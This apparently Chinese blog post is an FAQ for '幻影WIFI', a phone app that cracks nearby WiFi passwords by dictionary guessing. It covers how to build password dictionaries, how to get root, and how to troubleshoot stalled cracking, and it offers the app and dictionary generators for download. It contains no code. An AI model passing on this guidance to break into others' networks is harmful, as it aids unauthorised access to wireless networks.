高级字典：高级字典是一种规律密码的合集，通过软件内的字典管理中“新建”—“高级字典”得到，新建的高级字典中前四行务必填写（冒号后面可空），高级字典用法和普通字典一样。1、幻影WIFI根本破解不了WIFI？
你可能不清楚软件的破解原理，它无法100%破解成功，至今也没有100%破解成功的神软，但对于手机来说，幻影WIFI提供的字典破解方式不算落后啦。决定破解能否成功需要取决于字典中是否有正确的密码，只是你不知道什么时候才能轮到正确的密码，因此产生了破解XXX波还不成功这一说。但幻影保证此软件可以成功，不是骗人的，已经有很多机油成功了。2、破解好慢怎么办？破解需要多久？为什么不弄多线程？
由于手机硬件限制，系统无法同时用多个密码尝试连接，因此逐一连接速度不理想。另外请及时更新幻影WIFI最新版，速度会有所优化。由于硬件限制，多线程是不可能的。3、幻影WIFI需要ROOT权限才能破解吗？ROOT权限怎么获取？
幻影WIFI除了高级功能，其它无需ROOT权限。ROOT权限的获取建议您百度”您的机型”加上”空格ROOT”，按照教程即可。常见问题：1.破解卡住不动：
解决方法：①去信号好的地方；②模式切换；③换一个热点破解。2.破解成功但是密码不正确：
解决方法：①停用/删除已知密码的WIFI：②破解过程中不要操作WIFI。3.破解过程中总要我输入密码：
解决方法：刷机(除了MIUI一般不弹窗)。最后若重启手机还是无法破解则热点设置了MAC绑定，无法破解！选择别的热点吧，祝您好运！

 

我在把我搜藏的幻影WiFi Beta1轻聊版以及相关密码破字典生成器、字典资源分享给大家：

 

欢迎大家转载，请注明出处;https://mrxn.net  谢谢！